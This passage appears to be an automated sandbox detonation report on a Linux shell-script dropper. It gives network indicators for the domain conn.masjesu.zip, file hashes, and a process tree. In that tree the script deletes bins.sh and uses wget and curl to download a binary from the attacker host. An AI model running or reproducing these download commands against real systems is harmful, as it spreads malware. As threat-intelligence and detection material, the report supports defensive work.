| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
Files
/tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-28 02:44
Reported
2024-10-28 02:46
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
148s
Max time network
128s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh
[/tmp/6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| GB | 195.181.164.14:443 | tcp |